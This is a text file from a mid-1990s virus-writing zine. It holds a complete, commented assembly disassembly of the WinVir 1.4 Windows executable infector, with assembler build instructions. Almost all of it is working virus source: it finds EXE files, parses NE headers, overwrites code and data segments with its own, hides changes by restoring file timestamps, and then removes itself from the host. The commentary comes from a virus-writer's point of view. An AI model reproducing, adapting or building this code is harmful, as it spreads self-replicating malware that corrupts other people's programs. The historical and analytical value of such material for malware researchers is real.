home *** CD-ROM | disk | FTP | other *** search
/ HPAVC / HPAVC CD-ROM.iso / pc / MAGS.ZIP / VLAD#4.ZIP / ARTICLE.3_2 < prev    next >
Encoding:
Text File  |  1995-04-23  |  16.4 KB  |  548 lines
  1.  
  2. ;
  3. ;       WinVir 1.4 disassembly by Qark
  4. ;       Original virus written in the Netherlands
  5. ;        by Masud Khafir [Trident] in 1992.
  6. ;
  7. ; This is an interesting virus due to the very fact that it was the worlds
  8. ; first ever windows executable infector.
  9. ;
  10. ; The virus functions by copying code from the original code segment and
  11. ; auto data segment at offset 100h and appending it to the end of the
  12. ; program.  Then it places it own code and data in the corresponding
  13. ; segments.  
  15. ; When the infected program is executed from inside windows it will search
  16. ; the current directory for any windows executables.  It is very fussy about
  17. ; what it will infect, winmine.exe being one of the few programs it will do.
  18. ; After infecting all the files it can in the current directory, it will then
  19. ; disinfect itself from the program, restoring the original data, and exit
  20. ; back to windows.  The user will assume they clicked the icon incorrectly, 
  21. ; attempt again, at which time the program will function properly.
  22. ;
  23. ; I have heard some Anti-Virus figures claim the virus just fiddles with the
  24. ; DOS stub, but this is infact not the case.  It is a full direct action
  25. ; WinEXE infector.
  26. ;
  27. ; Overall, the virus is well optimised, and it is suprising that seeing
  28. ; how well Musad seems to understand the windows executable header that he
  29. ; couldn't have contrived to make the virus return directly to the original
  30. ; host program and thus make win infection viable earlier.
  31. ;
  32. ; There is an error in the virus with an 'lseek' that isn't even used and has
  33. ; been left out of the disassembly.
  34. ;
  35. ; The disassembly won't compile to be a byte match with the virus but is
  36. ; the same otherwise.
  37. ;
  38. ; Assemble with:
  39. ;  a86 +o winvir14.asm
  40. ;  link winvir14;
  41. ; Don't ask me why, but even my disassemblies only work with a86 ;)
  42. ;
  43.  
  44.  
  45. Virus_seg       Segment
  46. assume cs:virus_seg,ds:data_seg,ss:stack_seg
  47.         org     0fbh            ;This way the code written to the winexe will
  48.                                 ;be org 100h
  49. start:
  50.         mov     ax,data_seg
  51.         mov     ds,ax
  52.  
  53. ;--- From here on gets written to the windows executables ---
  54.         
  55.         cld
  56.         push    es              ;Save ES
  57.  
  58.         push    ds              ;Point DS to ES
  59.         pop     es
  60.  
  61.         mov     si,offset name_space
  62.         mov     di,offset name_space2
  63.         mov     cx,13
  64.         rep     movsb
  65.  
  66.         mov     dx,offset dta   ;Set DTA to our data area.
  67.         mov     ah,1ah
  68.         int     21h
  69.  
  70.         mov     dx,offset wildcard      ;We're looking for this.
  71.         xor     cx,cx                   ;Any attributes.
  72.         mov     ah,4eh                  ;Find first.
  73. find_next:
  74.         int     21h
  75.  
  76.         jc      not_found
  77.  
  78.         mov     dx,offset name_space    ;Infect the file we found.
  79.         call    infect
  80.         mov     ah,4fh                  ;Find next.
  81.         jmp     find_next
  82. not_found:
  83.         mov     dx,offset name_space2
  84.         call    disinfect
  85.         pop     es                      ;Why bother saving/restoring ES ?
  86.  
  87.         mov     ax,4c00h                ;Terminate.
  88.         int     21h
  89.  
  90. ;--Start of subroutines--
  91.  
  92. Infect  Proc    Near
  93.  
  94.         mov     ax,3d02h
  95.         int     21h
  96.         jc      bad_open
  97.         xchg    bx,ax
  98.         mov     si,offset buffer
  99.         call    file_check
  100.         jc      close_exit
  101.         cmp     word ptr [si+14h],100h  ;Check winexe entry IP. Marker ?
  102.         je      close_exit
  103.  
  104.         mov     ax,5700h
  105.         int     21h                     ;Get file date and time.
  106.  
  107.         push    cx
  108.         push    dx
  109.         call    infect_file
  110.         pop     dx
  111.         pop     cx
  112.  
  113.         mov     ax,5701h                ;Restore file date and time.
  114.         int     21h
  115.  
  116. close_exit:
  117.         mov     ah,3eh
  118.         int     21h
  119. bad_open:
  120.         ret
  121.  
  122. Infect  Endp
  123.  
  124. Disinfect       Proc    Near
  125.         mov     ax,3d02h                ;Open file
  126.         int     21h
  127.         jc      bad_open
  128.  
  129.         xchg    bx,ax
  130.  
  131.         mov     si,offset buffer
  132.         call    file_check
  133.         jc      close_exit
  134.  
  135.         ;Is the IP 100h ?  (This is probably the infection marker)
  136.         cmp     word ptr [si+14h],100h
  137.         jne     close_exit
  138.  
  139.         ;Save time/date.
  140.         mov     ax,5700h
  141.         int     21h
  142.  
  143.         push    cx
  144.         push    dx
  145.         call    fix_auto_data
  146.         call    fix_code_seg
  147.         pop     dx
  148.         pop     cx
  149.  
  150.         jmp     close_exit
  151. Disinfect       Endp
  152.  
  153. File_Check      Proc    Near
  154.         call    read_file
  155.         cmp     word ptr [si],'ZM'
  156.         jne     fail_exit
  157.         cmp     word ptr [si+18h],40h
  158.         jb      fail_exit
  159.         mov     ax,word ptr [si+3ch]
  160.         mov     dx,word ptr [si+3eh]
  161.         call    lseek
  162.         mov     word ptr ne_off,ax
  163.         mov     word ptr ne_off+2,dx
  164.         call    read_file
  165.         cmp     word ptr [si],'EN'              ;NE header ?
  166.         jne     fail_exit
  167.         cmp     word ptr [si+0ch],302h          ;Program/App flags
  168.                                                 ;Make sure program is
  169.                                                 ;'unshared' and uses win
  170.                                                 ;API (why bother checking
  171.                                                 ;this ??)
  172.         jne     fail_exit
  173.         cmp     word ptr [si+32h],4             ;Windows shift alignment
  174.         jne     fail_exit                       ;Make sure the shift is
  175.                                                 ;the standard value (why?)
  176.  
  177.         cmp     word ptr [si+36h],802h          ;target OS and exe flags
  178.         jne     fail_exit                       ;Make sure it runs under
  179.                                                 ;windows, and gangload area
  180.                                                 ;(why for ??)
  181.         clc
  182.         ret
  183. fail_exit:
  184.         stc
  185. badsize:
  186.         ret
  187. File_Check      Endp
  188.  
  189. Infect_File     Proc    Near
  190.  
  191.         ;Read the code segment entry into cs_seg
  192.         mov     ax,word ptr [si+16h]            ;AX=Newexe CS
  193.         mov     dx,offset cs_seg
  194.         call    read_rout
  195.         
  196.         ;How big is the CS ?
  197.         cmp     word ptr cs_length,code_size+100h
  198.         jb      badsize
  199.  
  200.  
  201.         cmp     byte ptr cs_attrib,50h          ;requires a preloaded,
  202.                                                 ;movable segment. (why ??)
  203.         jne     badsize
  204.         
  205.         ;Read the autodata segment entry into ds_seg
  206.         mov     ax,word ptr [si+0eh]            ;Auto data segment into AX
  207.         mov     dx,offset ds_seg
  208.         call    read_rout
  209.  
  210.         ;Make sure that DS is big enough for its purpose.
  211.         cmp     word ptr ds_length,datasize+300h
  212.         jb      badsize
  213.  
  214.         ;Lseek to the codesegment.
  215.         mov     ax,word ptr cs_off
  216.         call    lseek_2_segment
  217.  
  218.         ;Read in the codesegment
  219.         mov     dx,offset buffer2
  220.         mov     cx,code_size
  221.         call    read_2
  222.         call    lseek_end
  223.  
  224.         ;Write the original codesegment to the end of the file.
  225.         mov     dx,offset buffer2
  226.         mov     cx,code_size
  227.         call    write_2
  228.         
  229.         ;Lseek to the automatic datasegment.
  230.         mov     ax,word ptr ds_off
  231.         call    lseek_2_segment
  232.         
  233.         ;Read in the automatic datasegment.
  234.         mov     dx,offset buffer2
  235.         mov     cx,datasize
  236.         call    read_2
  237.         call    lseek_end
  238.  
  239.         ;Write the original datasegment to the end of the file, behind
  240.         ; the original code segment.
  241.         mov     dx,offset buffer2
  242.         mov     cx,datasize
  243.         call    write_2
  244.  
  245.         ;Save original segment attributes.
  246.         push    word ptr cs_attrib
  247.         pop     word ptr seg_attrib
  248.  
  249.         ;Remove the 'relocations' setting from the segment attribute.
  250.         ;This is so that the code doesn't get trashed by relocations
  251.         ;that were meant for the original program.
  252.         and     word ptr cs_attrib,0feffh
  253.  
  254.         ;Write the new code segment entry.
  255.         mov     ax,word ptr [si+16h]            ;CS into AX
  256.         mov     dx,offset cs_seg
  257.         call    write_rout
  258.  
  259.         ;Lseek to the start of the NewEXE header.
  260.         xor     ax,ax
  261.         cwd
  262.         call    fix_file_pointer
  263.         
  264.         ;Save the original IP and store it in seg_ip
  265.         push    word ptr [si+14h]
  266.         pop     word ptr seg_ip
  267.  
  268.         ;Set the IP to 100h
  269.         mov     word ptr [si+14h],100h
  270.  
  271.         ;Write the modified NE header back.
  272.         call    write_file
  273.         
  274.         ;Lseek to the code segment.
  275.         mov     ax,word ptr cs_off
  276.         call    lseek_2_segment             
  277.         
  278.         ;Write the virus code to the code segment.
  279.         push    ds
  280.         push    cs
  281.         pop     ds
  282.         mov     dx,100h                         ;DS:DX start of the virus
  283.         mov     cx,code_size                    ;Size of virus code.
  284.         call    write_2
  285.         pop     ds
  286.  
  287.         ;Lseek to the auto data segment.
  288.         mov     ax,word ptr ds_off
  289.         call    lseek_2_segment
  290.  
  291.         ;Write the virus data to the auto data segment.
  292.         mov     dx,100h
  293.         mov     cx,datasize
  294.         call    write_2
  295.  
  296.         ret
  297.  
  298. Infect_File     Endp
  299.  
  300. Fix_Auto_Data   Proc    Near
  301.         ;Read the autodata segment entry into ds_seg
  302.         mov     ax,word ptr [si+0eh]
  303.         mov     dx,offset ds_seg
  304.         call    read_rout
  305.  
  306.         ;Lseek to auto data segment.
  307.         mov     ax,word ptr ds_off
  308.         call    lseek_2_segment
  309.  
  310.         ;Read in the auto data segment into our data segment.
  311.         mov     dx,offset buffer
  312.         mov     cx,datasize
  313.         call    read_2
  314.         
  315.         ret
  316. Fix_Auto_Data   Endp
  317.  
  318. Fix_Code_Seg    Proc    Near
  319.         ;Restore the original CS attributes.
  320.         push    word ptr seg_attrib
  321.         pop     word ptr cs_attrib
  322.  
  323.         ;Write the code segment entry back to the executable.
  324.         mov     ax,word ptr [si+16h]    ;ax=code seg
  325.         call    Write_Rout
  326.         
  327.         ;Restore original IP.
  328.         push    word ptr seg_ip
  329.         pop     word ptr [si+14h]       ;restore IP
  330.  
  331.         ;Lseek to start of NE header.
  332.         xor     ax,ax
  333.         cwd
  334.         call    fix_file_pointer
  335.  
  336.         ;Write original NE header back.
  337.         call    write_file
  338.  
  339.         ;Lseek to end of file.
  340.         call    lseek_end
  341.  
  342.         ;File length is in DX:AX from lseek.  Subtracting will give an
  343.         ;offset from the end of the file.
  344.         sub     ax,datasize
  345.         sbb     dx,0
  346.  
  347.         push    ax
  348.         push    dx
  349.  
  350.         ;Lseek to original saved datasegment.
  351.         call    lseek
  352.         
  353.         ;Read original datasegment into buffer2.
  354.         mov     dx,offset buffer2
  355.         mov     cx,datasize
  356.         call    read_2
  357.         
  358.         ;Lseek to auto data segment.
  359.         mov     ax,word ptr ds_off
  360.         call    lseek_2_segment
  361.         
  362.         ;Write the original data segment back.
  363.         mov     dx,offset buffer2
  364.         mov     cx,datasize
  365.         call    write_2
  366.  
  367.         pop     dx
  368.         pop     ax
  369.         ;DX:AX=file offset of saved original data segment.
  370.         ;Subtracting will point to saved original code segment.
  371.         sub     ax,code_size
  372.         sbb     dx,0
  373.         
  374.         push    ax
  375.         push    dx
  376.  
  377.         ;Lseek to saved original code segment.
  378.         call    lseek
  379.  
  380.         ;Read original code segment into buffer2.
  381.         mov     dx,offset buffer2
  382.         mov     cx,code_size
  383.         call    read_2
  384.  
  385.         ;Lseek to CS.
  386.         mov     ax,word ptr cs_off
  387.         call    lseek_2_segment
  388.         
  389.         ;Write original CS back to program.
  390.         mov     dx,offset buffer2
  391.         mov     cx,code_size
  392.         call    write_2
  393.  
  394.         pop     dx
  395.         pop     ax
  396.  
  397.         ;Lseek to original stored CS appended to program.
  398.         call    lseek
  399.  
  400.         ;Truncate the saved data off the end of the file.
  401.         mov     cx,0                            ;xor cx,cx!
  402.         call    write_2
  403.  
  404.         ret
  405. Fix_Code_Seg    Endp
  406.  
  407. Read_Rout       Proc    Near
  408.         push    dx
  409.         dec     ax                              ;Segment entry - 1
  410.         mov     cx,8                            ;Segment table entry = 8
  411.         mul     cx                              ;Find the CS segment
  412.                                                 ;entry offset.
  413.         add     ax,word ptr [si+22h]            ;Segment table offset
  414.         adc     dx,0
  415.  
  416.         call    fix_file_pointer                ;Will lseek to the segment
  417.                                                 ;table entry of the segment.
  418.         pop     dx
  419.         mov     cx,8
  420.         jmp     read_2
  421.         
  422. Read_Rout       Endp
  423.  
  424. Read_File       Proc    Near
  425. ;sub8
  426.         mov     dx,offset buffer
  427.         mov     cx,40h
  428.  
  429. read_2  proc    near
  430.         mov     ah,3fh
  431.         int     21h
  432.         ret
  433. read_2  endp
  434. Read_File       EndP
  435.  
  436. Write_Rout      Proc    Near
  437.         push    dx
  438.         dec     ax                              ;Segment entry - 1
  439.         mov     cx,8                            ;Segment table entry = 8
  440.         mul     cx                              ;Find the CS segment
  441.                                                 ;entry offset.
  442.         add     ax,word ptr [si+22h]            ;Segment table offset
  443.         adc     dx,0
  444.  
  445.         call    fix_file_pointer                ;Will lseek to the segment
  446.                                                 ;table entry of the segment.
  447.         pop     dx
  448.         mov     cx,8
  449.         jmp     short write_2
  450.  
  451. Write_Rout      Endp
  452.  
  453. Write_File      Proc    Near
  454.         mov     dx,offset buffer
  455.         mov     cx,40h
  456. write_2 proc    near
  457.         mov     ah,40h
  458.         int     21h
  459.         ret
  460. write_2 endp
  461. Write_File      Endp
  462.  
  463. Lseek_End       Proc    Near
  464.  
  465.         mov     ax,4202h
  466.         xor     cx,cx
  467.         cwd
  468.         int     21h
  469.  
  470.         ret
  471. Lseek_End       Endp
  472.  
  473. Fix_File_Pointer        Proc    Near
  474.  
  475.         add     ax,word ptr ne_off
  476.         adc     dx,word ptr ne_off+2
  477.         jmp     short lseek
  478.  
  479. Fix_File_Pointer        Endp
  480.  
  481. Lseek_2_Segment Proc    Near
  482.         mov     cx,10h          ;Since the virus only infects programs
  483.                                 ;with a shift of 4 you can multiply by
  484.                                 ;16 to get the offset.
  485.         mul     cx
  486.         add     ax,100h         ;why ???
  487.         adc     dx,0
  488.         jmp     short lseek
  489.  
  490. Lseek_2_Segment Endp
  491.  
  492. Lseek   Proc    Near
  493. ;lseeks to dx:ax
  494.         xchg    cx,dx
  495.         xchg    dx,ax
  496.         mov     ax,4200h
  497.         int     21h
  498.         ret
  499.  
  500. Lseek   Endp
  501.  
  502. virusname       db      ' Virus_for_Windows  v1.4 '
  503. VCode_End:                             
  504. ;The size of the code segment.
  505. Code_Size       equ     offset vcode_end - 100h         ;$-100h
  506. Virus_Seg       Ends
  507.  
  508.  
  509. Data_Seg        Segment
  510.         db      100h    dup     (0)             ;This doesn't get written
  511.                                                 ;to file.
  512.  
  513.         buffer          db      40h dup ('a')   ;NE header is read into here.
  514.         
  515.         ;The code segment entry of the windows file to be infected.
  516.         cs_seg:                                                 ;140h
  517.         cs_off          dw      'bb'
  518.         cs_length       dw      'bb'                            ;142h
  519.         cs_attrib       dw      'bb'                            ;144h
  520.         cs_alloc        dw      'bb'
  521.  
  522.         ;The data segment entry of the windows file to be infected.
  523.         ds_seg:                                                 ;148h
  524.         ds_off          dw      'cc'
  525.         ds_length       dw      'cc'                            ;14ah
  526.         ds_attrib       dw      'cc'
  527.         ds_alloc        dw      'cc'
  528.  
  529.         dta             db      30 dup ('d')
  530.         name_space      db      13 dup ('d')
  531.         wildcard        db      '*.EXE',0
  532.         name_space2     db      13 dup ('e')
  533.  
  534.         ne_off          dd      0
  535.         seg_ip          dw      0
  536.         seg_attrib      dw      0                               ;1a2h
  537.         author          db      'MK92'
  538.         buffer2         db      8 dup (0)                       ;1a8h
  539.  
  540. Datasize equ offset buffer2 - 100h      ;Size of the datasegment.
  541. Data_Seg        Ends
  542.  
  543. Stack_Seg       Segment Stack
  544.         db      2000h   dup     (0)
  545. Stack_Seg       Ends
  546.  
  547. end     start
  548.